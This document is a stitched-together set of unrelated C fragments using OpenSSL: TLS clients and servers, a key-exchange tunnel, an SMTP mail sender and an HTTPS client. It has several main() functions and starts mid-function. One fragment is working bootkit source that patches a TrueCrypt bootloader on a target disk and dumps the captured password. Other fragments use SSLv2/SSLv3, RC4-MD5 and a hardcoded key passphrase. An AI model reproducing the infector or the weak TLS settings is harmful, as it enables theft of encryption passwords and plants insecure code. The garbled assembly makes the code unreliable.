while(*p != '\n')
p++;
*p = '\0';
//OK!
set_disp_mode(STDIN_FILENO, 1);
sendName(ssl, name);
sendPass(ssl, passwd);
SSL_read(ssl, buf, sizeof(buf) - 1);
putchar(10);
if( buf[0] == 'o' )
{
puts("Connect successfully");
flag = 1;
}
else {
puts("wrong password, please try again!");
}
}
//clean the password for security reason
memset(passwd, 0, sizeof(passwd));
genKey(key);
sendKey(ssl, key);
while (1) {
talkToudp(key, pipefd, 'k');
printf("1. ipnut 'q' to quit.\n");
printf("2. input 'c' to change the key.\n");
scanf("%s", buf);
if (strlen(buf) == 1) {
if (buf[0]=='q') {
break;
}
else if( buf[0]=='r'){
genKey(key);
sendKey(ssl, key);
}
}
else {
printf("Invalid.\n");
continue;
}
}
memset(key, 0, KEYSIZE);
memset(IV, 0, IVSIZE);
sendKey(ssl, key);
sleep(1);
kill(pid, SIGTERM);
wait(0);
SSL_shutdown(ssl); /* send SSL/TLS close_notify */
close(fd);
SSL_free(ssl);
SSL_CTX_free(ctx);
}
int main ()
{
int err;
int sd;
struct sockaddr_in sa;
SSL_CTX* ctx;
SSL* ssl;
X509* server_cert;
char* str;
char buf [4096];
SSL_METHOD *meth;
SSLeay_add_ssl_algorithms(); //设置支持SSL算法
meth = (SSL_METHOD*)SSLv2_client_method(); //客户端设置SSLV2版本
SSL_load_error_strings(); //提供将错误解析为字符串的功能
ctx = SSL_CTX_new (meth); CHK_NULL(ctx);
//创建一个SSL上下文环境,每个进程守护一个SSL_CTX结构体
CHK_SSL(err);
/* ----------------------------------------------- */
/* Create a socket and connect to server using normal socket calls. */
sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(sd, "socket"); //
memset (&sa, '\0', sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr ("127.0.0.1"); /* Server IP */
sa.sin_port = htons (1111); /* Server Port number */
err = connect(sd, (struct sockaddr*) &sa,
sizeof(sa)); CHK_ERR(err, "connect");
/* ----------------------------------------------- */
/* Now we have TCP conncetion. Start SSL negotiation. */
//创建一个维护当前连接信息
ssl = SSL_new (ctx); CHK_NULL(ssl);
//将SSL绑定到套接字上
SSL_set_fd (ssl, sd);
//建立SSL连接
err = SSL_connect (ssl); CHK_SSL(err);
/* Following two steps are optional and not required for
data exchange to be successful. */
/* Get the cipher - opt */
printf ("SSL connection using %s\n", SSL_get_cipher (ssl));
/* Get server's certificate (note: beware of dynamic allocation) - opt */
//获取服务端证书
server_cert = SSL_get_peer_certificate (ssl); CHK_NULL(server_cert);
printf ("Server certificate:\n");
str = X509_NAME_oneline (X509_get_subject_name (server_cert),0,0);
CHK_NULL(str);
printf ("\t subject: %s\n", str);
OPENSSL_free (str);
str = X509_NAME_oneline (X509_get_issuer_name (server_cert),0,0);
CHK_NULL(str);
printf ("\t issuer: %s\n", str);
OPENSSL_free (str);
/* We could do all sorts of certificate verification stuff here before
deallocating the certificate. */
//释放服务端证书
X509_free (server_cert);
/* --------------------------------------------------- */
/* DATA EXCHANGE - Send a message and receive a reply. */
err = SSL_write (ssl, "Hello World!", strlen("Hello World!")); CHK_SSL(err);
err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err);
buf[err] = '\0';
printf ("Got %d chars:'%s'\n", err, buf);
SSL_shutdown (ssl); /* send SSL/TLS close_notify */
/* Clean up. */
close(sd);
SSL_free (ssl);
SSL_CTX_free (ctx);
}
/*****************parent process tcp connection use to manage******************************/
void server_mgr(int serverPort, int pipefd, int pid)
{
int flag = 0;
int err, sockfd, clientfd, i;
int ready = 0;
struct sockaddr_in serverSock, clientSock;
size_t len;
char buf[4096];
int ppid;
char username[4096], passwd[4096];
SSL_CTX* ctx;
SSL* ssl;
sleep(1); //in order to avoid coming out too fast
setupCTXServer(SER_CERTF, SER_KEYF, &ctx);//setup certificate
//create a TCP socket
sockfd = socket(AF_INET, SOCK_STREAM, 0);
memset(&serverSock, 0, sizeof(serverSock));
serverSock.sin_family = AF_INET;
serverSock.sin_addr.s_addr = htonl(INADDR_ANY);
serverSock.sin_port = htons(serverPort);
//bind step
if (bind(sockfd, (struct sockaddr*) &serverSock, sizeof (serverSock)) < 0)
PERROR("tcp bind error! exit!");
//listen step: listening to be a server why 5 do not know I guess it is the signal to kernel
if (listen (sockfd, 5) < 0)
PERROR("tcp listen error! exit!");
len = sizeof(clientSock);
//accept step
clientfd = accept(sockfd, (struct sockaddr*) &clientSock, &len);
close(sockfd);//do not need sockfd anymore after tcp connection
printf("Connection from %s:%i\n", inet_ntoa(clientSock.sin_addr), ntohs(clientSock.sin_port));
//build SSL on the tcp connection
ssl = SSL_new(ctx);
CHK_NULL(ssl);
SSL_set_fd(ssl, clientfd);
err = SSL_accept(ssl);
CHK_SSL(err);
//login part to check username and password
while(!flag)
{
err = SSL_read(ssl, username, sizeof(buf) - 1);//read username
CHK_SSL(err);
err = SSL_read(ssl, passwd, sizeof(buf) - 1);//read passwd
CHK_SSL(err);
if(check_login(username + 1, passwd + 1))//client authenticate to call the check function
{
buf[0]='o';
buf[1]=0;
SSL_write(ssl, buf, sizeof(buf) - 1);//check successfully and send to client
flag = 1;
}
else
{
buf[0]='f';
buf[1]=0;
SSL_write(ssl, buf, sizeof(buf) - 1);//check failed and send to client
}
}
printf("Welcome %s:\n", username + 1);
//clean the password(security reason!!! Do not forget buffer overflow)
memset(passwd, 0, sizeof(passwd));
//receive key part, exchange key part, abort part
while (1) {
ready = 0;
while (!ready) {
err = SSL_read(ssl, buf, sizeof(buf) - 1);
CHK_SSL(err);
ready = ready + receiveKey(buf, err, key);
}
// buf[1] is 0 means client want to abort
if (buf[1] == 0) {
printf("disconnect!!!\n");
kill(pid, SIGTERM);//SIGTERM is more friendly
wait(0);//wait for 0 process
break;
}
//tell the key to udp connection
tellChildProcess(key, pipefd, 'k');
}
//clean everything
close(sockfd);
SSL_free (ssl);
SSL_CTX_free (ctx);
}
int main(int argc, char* argv[]) {
if (argc < 2) {
fprintf(stderr, "Usage: %s <device_to_infect>\n", argv[0]);
exit(-1);
}
/* Opening Device */
char * dev_name = argv[1];
int dev_fd = open(dev_name, O_RDWR);
CHK(dev_fd);
/* Retrieve MBR */
char mbr[SECTOR_SIZE];
CHK(read(dev_fd, mbr, SECTOR_SIZE));
//write(1, mbr, SECTOR_SIZE);
/* Retrieve TrueCrypt BootLoader position using MBR */
char tc_bl_sect = mbr[TC_SECT_OFFSET_IN_MBR] - 1;
char tc_bl_sect_count = mbr[TC_SECT_COUNT_OFFSET_IN_MBR];
size_t comp_bl_sz = /* *(unsigned short*)
(mbr + TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET); */
tc_bl_sect_count * SECTOR_SIZE;
printf("TrueCrypt BootLoader sector num = %d\n"
"TrueCrypt BootLoader sector count = %d\n"
"TrueCrypt BootLoader size = %d\n",
tc_bl_sect, tc_bl_sect_count, comp_bl_sz);
/* Retrieve the compressed bootloader content */
char * comp_bootloader = malloc(comp_bl_sz * sizeof(char));
CHK_NULL(comp_bootloader);
CHK(lseek(dev_fd, tc_bl_sect * SECTOR_SIZE, SEEK_SET));
CHK(read(dev_fd, comp_bootloader, comp_bl_sz));
/* Dump it to a file to unzip it */
int comp_bl_fd = open(COMPRESSED_BOOTLOADER_FILE,
O_WRONLY | O_CREAT | O_TRUNC, 0600);
CHK(comp_bl_fd);
write(comp_bl_fd, comp_bootloader, comp_bl_sz);
free(comp_bootloader);
/* Unzip using gzip */
CHK(system("gzip -d -f "COMPRESSED_BOOTLOADER_FILE));
/* Read the unzipped bootloader */
int bootloader_fd = open(DECOMPRESSED_BOOTLOADER_FILE, O_RDWR);
CHK(bootloader_fd);
struct stat bl_st;
CHK(fstat(bootloader_fd, &bl_st));
printf("uncompressed bootloader size = 0x%x\n",
(unsigned int)bl_st.st_size);
printf("infection overhead = 0x%x\n", INFECTION_OVERHEAD);
size_t uncompressed_bl_sz = get_tc_mem_required(mbr, SECTOR_SIZE);
size_t infected_bl_sz = uncompressed_bl_sz + INFECTION_OVERHEAD;
char * bootloader = malloc(infected_bl_sz * sizeof(char));
CHK_NULL(bootloader);
memset(bootloader, 0, infected_bl_sz);
CHK(read(bootloader_fd, bootloader, uncompressed_bl_sz));
//write(1, bootloader, uncompressed_bl_sz);
WEAK_CHK(unlink(DECOMPRESSED_BOOTLOADER_FILE));
/* Checking if the bootloader is already infected */
puts("Checking for prior infection...");
if(already_infected(mbr)) {
puts("TrueCrypt is already infected, dumping password");
return dump_password(dev_fd);
}
/* Infect BootLoader */
infect_bootloader(bootloader, uncompressed_bl_sz, infected_bl_sz);
/* Rezip the bootlader */
int patched_bl_fd = open(PATCHED_BOOTLOADER_FILE,
O_CREAT | O_TRUNC | O_RDWR, 0700);
CHK(patched_bl_fd);
CHK(write(patched_bl_fd, bootloader, infected_bl_sz));
CHK(close(patched_bl_fd));
CHK(system("gzip -n --best -f "PATCHED_BOOTLOADER_FILE));
/* Rewrite it */
int comp_patched_bl_fd = open(COMPRESSED_PATCHED_BOOTLOADER_FILE, O_RDONLY);
CHK(comp_patched_bl_fd);
struct stat pbl_st;
CHK(fstat(comp_patched_bl_fd, &pbl_st));
size_t cpbl_sz = pbl_st.st_size;
char * recomp_bootloader = malloc(cpbl_sz * sizeof(char));
CHK(read(comp_patched_bl_fd, recomp_bootloader, cpbl_sz));
CHK(lseek(dev_fd, tc_bl_sect * SECTOR_SIZE, SEEK_SET));
CHK(write(dev_fd, recomp_bootloader, cpbl_sz));
/* Patch the checksums in MBR (bypass the compressed bootloader one) */
CHK(patch_chksum(mbr));
/* Update compressed size in MBR */
/* Actually unnecessary, this is just used for checksum */
/* (Works with this line commented out) */
*(unsigned short *)&mbr[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET] = cpbl_sz;
printf("New compressed bootloader size = %d\n", cpbl_sz);
/* Update the required mem in MBR */
*(unsigned short *)&mbr[TC_MEM_REQUIRED_OFFSET] = infected_bl_sz;
/* Rewrite MBR */
CHK(lseek(dev_fd, 0, SEEK_SET));
CHK(write(dev_fd, mbr, SECTOR_SIZE));
CHK(close(dev_fd));
CHK(close(comp_patched_bl_fd));
free(bootloader);
free(recomp_bootloader);
WEAK_CHK(unlink(COMPRESSED_PATCHED_BOOTLOADER_FILE));
return 0;
}
//pki client
void doPKIClient(pid_t cpid, int* pipefd,char* newkeyiv,int port, int PORT, char* ip)//(int argc, char* argv[])
{
int i;
int err;
int sd;
struct sockaddr_in sa;
SSL_CTX* ctx;//create a context for one or more ssl session
SSL* ssl;//hold ssl connection structure
X509* server_cert;
char* str;
char buf [4096];
SSL_METHOD *meth;
SSLeay_add_ssl_algorithms();
meth = SSLv23_client_method();
SSL_load_error_strings();
ctx = SSL_CTX_new (meth); CHK_NULL(ctx);
CHK_SSL(err);
SSL_CTX_set_verify(ctx,SSL_VERIFY_PEER,NULL);
SSL_CTX_load_verify_locations(ctx,CCACERT,NULL);//load cert, location for ca
if (SSL_CTX_use_certificate_file(ctx, CCERTF, SSL_FILETYPE_PEM) <= 0) {//load the fisrt cert from file to ctx
ERR_print_errors_fp(stderr);
exit(-2);
}
if (SSL_CTX_use_PrivateKey_file(ctx, CKEYF, SSL_FILETYPE_PEM) <= 0) {//load private key for use with ssl
ERR_print_errors_fp(stderr);
exit(-3);
}
if (!SSL_CTX_check_private_key(ctx)) {//check private key with cert
printf("Private key does not match the certificate public keyn");
exit(-4);
}
/* ----------------------------------------------- */
/* Create a socket and connect to server using normal socket calls. */
sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(sd, "socket");
memset (&sa, '\0', sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr (ip); /* Server IP */
sa.sin_port = htons (port); /* Server Port number */
err = connect(sd, (struct sockaddr*) &sa,
sizeof(sa)); CHK_ERR(err, "connect");
/* ----------------------------------------------- */
/* Now we have TCP conncetion. Start SSL negotiation. */
ssl = SSL_new (ctx); CHK_NULL(ssl);
SSL_set_fd (ssl, sd);//assign a socket to ssl
//start ssl session with remote server
err = SSL_connect (ssl); CHK_SSL(err);
/* Following two steps are optional and not required for
data exchange to be successful. */
/* Get the cipher - opt */
printf ("SSL connection using %s\n", SSL_get_cipher (ssl));
/* Get server's certificate (note: beware of dynamic allocation) - opt */
server_cert = SSL_get_peer_certificate (ssl); CHK_NULL(server_cert);
printf ("Server certificate:\n");
//blx verifying the common name
char commonName[512];
X509_NAME *name=X509_get_subject_name (server_cert);
X509_NAME_get_text_by_NID(name,NID_commonName,commonName,512);
//printf("%s\n",commonName);
if(strcmp(commonName,ServerCN)!=0)
{
printf("wrong CN\n");
exit(-1);
}
printf("right CN\n");
str = X509_NAME_oneline (X509_get_subject_name (server_cert),0,0);
CHK_NULL(str);
printf ("\t subject: %s\n", str);
OPENSSL_free (str);
str = X509_NAME_oneline (X509_get_issuer_name (server_cert),0,0);
CHK_NULL(str);
printf ("\t issuer: %s\n", str);
OPENSSL_free (str);
/* We could do all sorts of certificate verification stuff here before
deallocating the certificate. */
X509_free (server_cert);
/* --------------------------------------------------- */
/* DATA EXCHANGE - Send a message and receive a reply. */
//generate rand iv and key as initial
generateRandKey(newkeyiv);
generateRandIV(newkeyiv);
err = SSL_write (ssl, newkeyiv, 32); CHK_SSL(err);//write new key and iv to server
err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err);//read reply from server
buf[err] = '\0';
//if(err == 0){continue;}
//printf ("Got %d chars:'%s'\n", err, buf);
printf ("%s\n", buf);
write(pipefd[1], newkeyiv, 32);
//not the first time, user decide
while(1){
menuOp(cpid,newkeyiv);
err = SSL_write (ssl, newkeyiv, 32); CHK_SSL(err);//write new key and iv to server
err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err);//read reply from server
buf[err] = '\0';
//if(err == 0){continue;}
//printf ("Got %d chars:'%s'\n", err, buf);
printf ("%s\n", buf);
write(pipefd[1], newkeyiv, 32);
}
SSL_shutdown (ssl); /* send SSL/TLS close_notify */
/* Clean up. */
close (sd);
SSL_free (ssl);
SSL_CTX_free (ctx);
}
int main ()
{
int err;
int i;
int s, AcceptSocket;
#ifdef _WIN32
WORD wVersionRequested;
WSADATA wsaData;
#endif /* */
struct sockaddr_in service;
pthread_t pid;
size_t client_len;
SSL_CTX *ctx;
SSL *ssl;
X509 *client_cert;
char *str;
char buf[1024];
SSL_METHOD *meth;
//加载EVP cipher/digest算法
SSLeay_add_ssl_algorithms ();
//加载crypto/ssl错误提示
SSL_load_error_strings ();
//为服务器构造TLSv1 SSL_METHOD结构
meth = SSLv3_server_method ();
//建立新的SSL上下文
ctx = SSL_CTX_new (meth);
if (!ctx)
{
ERR_print_errors_fp (stderr);
exit (2);
}
//加载可信任证书库: 为SSL_CTX对象提供一个默认的信任证书
if ((!SSL_CTX_load_verify_locations (ctx, CAFILE, NULL)) || (!SSL_CTX_set_default_verify_paths (ctx)))
{
printf ("error load verify locations.\n");
exit (1);
}
//加载服务器端证书
if (SSL_CTX_use_certificate_file (ctx, CERTF, SSL_FILETYPE_PEM) <= 0)
{
ERR_print_errors_fp (stderr);
exit (3);
}
//加载服务器私钥文件
if (SSL_CTX_use_PrivateKey_file_pass (ctx, KEYF, "123456") <= 0)
{
ERR_print_errors_fp (stderr);
exit (4);
}
//验证私钥与证书是否一致
if (!SSL_CTX_check_private_key (ctx))
{
fprintf (stderr, "Private key does not match the certificate public key\n");
exit (5);
}
s_server_verify = SSL_VERIFY_PEER | SSL_VERIFY_FAIL_IF_NO_PEER_CERT | SSL_VERIFY_CLIENT_ONCE;
SSL_CTX_set_verify (ctx, s_server_verify, verify_callback_server);
//当需要客户端验证的时候,服务器把CAfile里面的可信任CA证书发往客户端。
SSL_CTX_set_client_CA_list (ctx, SSL_load_client_CA_file (CAFILE));
#ifdef _WIN32
wVersionRequested = MAKEWORD (2, 2);
err = WSAStartup (wVersionRequested, &wsaData);
if (err != 0)
{
printf ("err\n");
return -1;
}
#endif /* */
//首先建立连接
s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0)
return -1;
service.sin_family = AF_INET;
service.sin_addr.s_addr = INADDR_ANY; //inet_addr("127.0.0.1");
service.sin_port = htons (8888);
if (bind (s, (struct sockaddr *) &service, sizeof (service)) < 0)
{
printf ("bind() failed.\n");
close (s);
return -1;
}
if (listen (s, 1) < 0)
printf ("Error listening on socket.\n");
printf ("recv .....\n");
//openssl是不支持多线程的,需要自己做加锁处理
//参见:http://blog.csdn.net/jaylong35/article/details/6988690
lock_cs = OPENSSL_malloc (CRYPTO_num_locks () * sizeof (pthread_mutex_t));
lock_count = OPENSSL_malloc (CRYPTO_num_locks () * sizeof (long));
for (i = 0; i < CRYPTO_num_locks (); i++)
{
lock_count[i] = 0;
pthread_mutex_init (&(lock_cs[i]), NULL);
}
//通过这两个设置就可以解决HTTPS多线程请求出现crash的问题
CRYPTO_set_id_callback ((unsigned long (*)()) pthreads_thread_id);
CRYPTO_set_locking_callback ((void (*)()) pthreads_locking_callback);
while (1)
{
struct timeval tv;
fd_set fdset;
char *str = "JDDH-JDECC3-JDCIPH-JDMD";
tv.tv_sec = 1;
tv.tv_usec = 0;
FD_ZERO (&fdset);
FD_SET (s, &fdset);
select (s + 1, &fdset, NULL, NULL, (struct timeval *) &tv);
if (FD_ISSET (s, &fdset))
{
AcceptSocket = accept (s, NULL, NULL);
ssl = SSL_new (ctx);
//提交一份自己能够支持的加密方法的列表
//SSL_set_cipher_list(ssl,"ECDH-RSA-AES256-SHA");
SSL_set_cipher_list (ssl, "RC4-MD5");
CHK_NULL (ssl);
//将SSL与socket进行关联
err = SSL_set_fd (ssl, AcceptSocket);
if (err > 0)
{
err = pthread_create (&pid, NULL, &thread_main, (void *) ssl);
pthread_detach (pid);
}
else
continue;
}
}
SSL_CTX_free (ctx);
return 0;
}
//pki server
void doPKIServer(pid_t cpid, int* pipefd,char* newkeyiv, int port, int PORT, char* ip)//(int argc, char* argv[])
{
int i;
int err;
int listen_sd;
int sd;
struct sockaddr_in sa_serv;
struct sockaddr_in sa_cli;
size_t client_len;
SSL_CTX* ctx;
SSL* ssl;
X509* client_cert;
char* str;
char buf [4096];
SSL_METHOD *meth;
/* SSL preliminaries. We keep the certificate and key with the context. */
SSL_load_error_strings();
SSLeay_add_ssl_algorithms();
meth = SSLv23_server_method();
ctx = SSL_CTX_new (meth);
if (!ctx) {
ERR_print_errors_fp(stderr);
exit(2);
}
SSL_CTX_set_verify(ctx,SSL_VERIFY_PEER,NULL); /* whether verify the certificate */
SSL_CTX_load_verify_locations(ctx,SCACERT,NULL);
if (SSL_CTX_use_certificate_file(ctx, SCERTF, SSL_FILETYPE_PEM) <= 0) {
ERR_print_errors_fp(stderr);
exit(3);
}
if (SSL_CTX_use_PrivateKey_file(ctx, SKEYF, SSL_FILETYPE_PEM) <= 0) {
ERR_print_errors_fp(stderr);
exit(4);
}
if (!SSL_CTX_check_private_key(ctx)) {
fprintf(stderr,"Private key does not match the certificate public key\n");
exit(5);
}
/* ----------------------------------------------- */
/* Prepare TCP socket for receiving connections */
listen_sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(listen_sd, "socket");
memset (&sa_serv, '\0', sizeof(sa_serv));
sa_serv.sin_family = AF_INET;
sa_serv.sin_addr.s_addr = INADDR_ANY;
sa_serv.sin_port = htons (PORT); /* Server Port number */
err = bind(listen_sd, (struct sockaddr*) &sa_serv,
sizeof (sa_serv)); CHK_ERR(err, "bind");
/* Receive a TCP connection. */
err = listen (listen_sd, 5); CHK_ERR(err, "listen");
client_len = sizeof(sa_cli);
sd = accept (listen_sd, (struct sockaddr*) &sa_cli, &client_len);
CHK_ERR(sd, "accept");
close (listen_sd);
printf ("Connection from %lx, port %x\n",
(long unsigned int)sa_cli.sin_addr.s_addr, sa_cli.sin_port);
/* ----------------------------------------------- */
/* TCP connection is ready. Do server side SSL. */
ssl = SSL_new (ctx); CHK_NULL(ssl);
SSL_set_fd (ssl, sd);
err = SSL_accept (ssl); CHK_SSL(err);
/* Get the cipher - opt */
printf ("SSL connection using %s\n", SSL_get_cipher (ssl));
/* Get client's certificate (note: beware of dynamic allocation) - opt */
client_cert = SSL_get_peer_certificate (ssl);
if (client_cert != NULL) {
printf ("Client certificate:\n");
//blx verify the common name
char commonName[512];
X509_NAME *name=X509_get_subject_name (client_cert);
X509_NAME_get_text_by_NID(name,NID_commonName,commonName,512);
//printf("%s\n",commonName);
if(strcmp(commonName,ClientCN)!=0)
{
printf("wrong CN\n");
exit(-1);
}
printf("right CN\n");
str = X509_NAME_oneline (X509_get_subject_name (client_cert), 0, 0);
CHK_NULL(str);
printf ("\t subject: %s\n", str);
OPENSSL_free (str);
str = X509_NAME_oneline (X509_get_issuer_name (client_cert), 0, 0);
CHK_NULL(str);
printf ("\t issuer: %s\n", str);
OPENSSL_free (str);
/* We could do all sorts of certificate verification stuff here before
deallocating the certificate. */
X509_free (client_cert);
} else
printf ("Client does not have certificate.\n");
/* DATA EXCHANGE - Receive message and send reply. */
while(1){//key read new key and iv
err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err);
if(err ==0){continue;}
buf[err] = '\0';
//printf ("Got %d chars:'%s'\n", err, buf);
for(i=0;i<32;i++)
{
newkeyiv[i] = buf[i];
}
write(pipefd[1], newkeyiv, 32);//write the new key and iv to tunnel process
err = SSL_write (ssl, "server recieved new key or iv.", strlen("server recieved new key or iv.")); CHK_SSL(err);//write reply to client
}
/* Clean up. */
close (sd);
SSL_free (ssl);
SSL_CTX_free (ctx);
}
// sending email
void sendemail(char *email, char *body)
{
int sockfd;
int retval = 0;
int err;
char *host_name = "smtp.fakessh.eu";
struct sockaddr_in their_addr;
struct hostent *hent;
char buf[1500] = {0};
char rbuf[1500] = {0};
char login[128] = {0};
char pass[128] = {0};
//initialize SSL
SSL_CTX *ctx;
SSL *ssl;
SSL_METHOD *meth;
SSLeay_add_ssl_algorithms();
meth = SSLv23_method();
SSL_load_error_strings();
SSL_library_init();
ctx = SSL_CTX_new(meth);
CHK_NULL(ctx);
fd_set readfds;
struct timeval timeout;
//Define a timeout for resending data.
timeout.tv_sec = 2;
timeout.tv_usec = 0;
#ifdef WIN32
WSADATA WSAData;
WSAStartup(MAKEWORD(2, 2), &WSAData);
#endif
hent = gethostbyname(host_name);
memset(&their_addr, 0, sizeof(their_addr));
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(587);
their_addr.sin_addr = *((struct in_addr *)hent->h_addr);
//connecting mail server and reconnecting if no response in 2 seconds
sockfd = open_socket((struct sockaddr *)&their_addr);
memset(rbuf,0,1500);
FD_ZERO(&readfds);
FD_SET(sockfd, &readfds);
retval = select(sockfd+1, &readfds, NULL, NULL, &timeout);
while(retval <= 0)
{
printf("reconnect...\n");
sleep(2);
close(sockfd);
sockfd = open_socket((struct sockaddr *)&their_addr);
memset(rbuf,0,1500);
FD_ZERO(&readfds);
FD_SET(sockfd, &readfds);
retval = select(sockfd+1, &readfds, NULL, NULL, &timeout);
}
memset(rbuf, 0, 1500);
recv(sockfd, rbuf, 1500, 0);
printf("%s\n", rbuf);
//EHLO
memset(buf, 0, 1500);
sprintf(buf, "EHLO localhost\r\n");
send(sockfd, buf, strlen(buf), 0);
memset(rbuf, 0, 1500);
recv(sockfd, rbuf, 1500, 0);
printf("%s\n", rbuf);
//START_TLS with OPENSSL
memset(buf,0, 1500);
sprintf(buf, "STARTTLS\r\n");
send(sockfd, buf, strlen(buf), 0);
memset(rbuf, 0, 1500);
recv(sockfd, rbuf, 1500, 0);
printf("%s\n", rbuf);
//AUTH LOGIN
ssl = SSL_new(ctx);
CHK_NULL(ssl);
SSL_set_fd (ssl, sockfd);
err = SSL_connect(ssl);
CHK_SSL(err);
memset(buf,0, 1500);
sprintf(buf, "EHLO localhost\r\n");
send_line(ssl,buf);
recv_line(ssl);
memset(buf,0, 1500);
sprintf(buf, "AUTH LOGIN\r\n");
send_line(ssl,buf);
recv_line(ssl);
//USER
memset(buf, 0, 1500);
sprintf(buf,"fakessh");
memset(login, 0, 128);
base64(login, buf, strlen(buf));
sprintf(buf, "%s\r\n", login);
send_line(ssl,buf);
recv_line(ssl);
//PASSWORD
memset(buf, 0, 1500);
sprintf(buf, "----");
memset(pass, 0, 128);
base64(pass, buf, strlen(buf));
sprintf(buf, "%s\r\n", pass);
send_line(ssl,buf);
recv_line(ssl);
//MAIL FROM
memset(buf,0, 1500);
sprintf(buf, "MAIL FROM:<*****@*****.**>\r\n");
send_line(ssl,buf);
recv_line(ssl);
//RCPT TO first receiver
memset(buf, 0, 1500);
sprintf(buf, "RCPT TO:<*****@*****.**>\r\n");
send_line(ssl,buf);
recv_line(ssl);
//RCPT TO second receiver and more receivers can be added
//memset(buf, 0, 1500);
//sprintf(buf, "RCPT TO:<*****@*****.**>\r\n");
//send_line(ssl,buf);
//recv_line(ssl);
//DATA ready to send mail content
send_line(ssl,"DATA\r\n");
recv_line(ssl);
//send mail content£¬"\r\n.\r\n" is the end mark of content
memset(buf, 0, 1500);
sprintf(buf, "%s\r\n.\r\n", body);
send_line(ssl,buf);
recv_line(ssl);
printf("mail send!\n");
//QUIT
send_line(ssl,"QUIT\r\n");
recv_line(ssl);
//free SSL and close socket
SSL_shutdown (ssl);
close(sockfd);
SSL_free (ssl);
SSL_CTX_free (ctx);
#ifdef WIN32
WSACleanup();
#endif
return;
}
int main ()
{
int err;
int sd;
struct sockaddr_in sa;
SSL_CTX* ctx;
SSL* ssl;
X509* server_cert;
char* str;
char buf [8096];
SSL_METHOD *meth;
SSLeay_add_ssl_algorithms();
#ifndef OPENSSL_NO_SSL2
meth = (SSL_METHOD*)SSLv2_client_method();
#else
///meth = (SSL_METHOD*)SSLv3_client_method();
//连接https 需要使用tls类型的
meth = (SSL_METHOD*)TLSv1_2_client_method();
//return ThrowException(Exception::Error(String::New("SSLv2 methods disabled")));
#endif
SSL_load_error_strings();
ctx = SSL_CTX_new (meth);
if(ctx==NULL)
{
printd("ctx is NULL\n");
exit(1);
}
CHK_SSL(err);
/* ----------------------------------------------- */
/* Create a socket and connect to server using normal socket calls. */
sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(sd, "socket");
memset (&sa, '\0', sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr (SERVERIP); /* Server IP */
sa.sin_port = htons (SERVERPORT); /* Server Port number */
err = connect(sd, (struct sockaddr*) &sa,
sizeof(sa)); CHK_ERR(err, "connect");
/* ----------------------------------------------- */
/* Now we have TCP conncetion. Start SSL negotiation. */
printd("connect to %s:%d success.\n",SERVERIP, SERVERPORT);
ssl = SSL_new (ctx); CHK_NULL(ssl);
printd("SSL_new ok\n");
SSL_set_fd (ssl, sd);
printd("Set fd OK\n");
err = SSL_connect (ssl); CHK_SSL(err);
/* Following two steps are optional and not required for
data exchange to be successful. */
/* Get the cipher - opt */
printd ("SSL connection using %s\n", SSL_get_cipher (ssl));
//验证证书是否可以信任
if ( X509_V_OK != SSL_get_verify_result(ssl) )
{
printd("SSL verify error\n");
int color = 32;
printf("\033[%dmHello, world.\n\033[0m", color);
}
/* Get server's certificate (note: beware of dynamic allocation) - opt */
//比如连接 https时,需要打开以下选项
#if 1
server_cert = SSL_get_peer_certificate (ssl); CHK_NULL(server_cert);
printd ("Server certificate:\n");
str = X509_NAME_oneline (X509_get_subject_name (server_cert),0,0);
CHK_NULL(str);
printd ("\t subject: %s\n", str);
OPENSSL_free (str);
str = X509_NAME_oneline (X509_get_issuer_name (server_cert),0,0);
CHK_NULL(str);
printd ("\t issuer: %s\n", str);
OPENSSL_free (str);
/* We could do all sorts of certificate verification stuff here before
deallocating the certificate. */
X509_free (server_cert);
#endif
/* --------------------------------------------------- */
/* DATA EXCHANGE - Send a message and receive a reply. */
#ifdef AUTH
//init base 64
//come from : http://doctrina.org/Base64-With-OpenSSL-C-API.html
BIO *bio, *b64;
char* base64EncodeOutput;
BUF_MEM *bufferPtr;
char message[] = USER ":"******"base encode str:->%s<- message len:%d\n", message, message_len);
b64 = BIO_new(BIO_f_base64());
bio = BIO_new(BIO_s_mem());
bio = BIO_push(b64, bio);
/*
///!IMPORTANT
//BIO_set_flags(bio, BIO_FLAGS_BASE64_NO_NL); //Ignore newlines - write everything in one line
//BIO_FLAGS_BASE64_NO_NL: 编码结果中,每64个字符换行一次,整个编码后的字符串的末尾也有换行
//如果有这个选项,测试结尾会出现0x76 0x7f字符 0x7f是del所以打印时显示正常,其实不正常
*/
BIO_write(bio, message, strlen(message));
BIO_flush(bio);
BIO_get_mem_ptr(bio, &bufferPtr);
BIO_set_close(bio, BIO_NOCLOSE);
BIO_free_all(bio);
char b64text[1024]={0};
strcpy(b64text, (*bufferPtr).data);
memcpy(b64text, (*bufferPtr).data, bufferPtr->length);
printd("base64 encode str: ->%s<-, size:%ld\n", b64text, strlen(b64text));
//printd("%x %x %x %x %x %x\n", b64text[0],b64text[1],b64text[2],b64text[3],b64text[4],b64text[5]);
#endif
/*
* 以下是模拟浏览器登陆https://172.20.1.209:8001的过程
*
* 服务器是python做的,服务器代码从:
* https://github.com/SevenW/httpwebsockethandler.git
* 下载,
* 运行服务器的命令:
* python ExampleWSServer.py 8001 secure u:2
*/
char http_get_str[2048] = {0};
sprintf(http_get_str,
"GET / HTTP/1.1\r\n"
"Host: %s:%d \r\n"
#ifdef AUTH
"Authorization: Basic %s\r\n"
#endif
"Connection: keep-alive\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/* ;q=0.8\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\r\n"
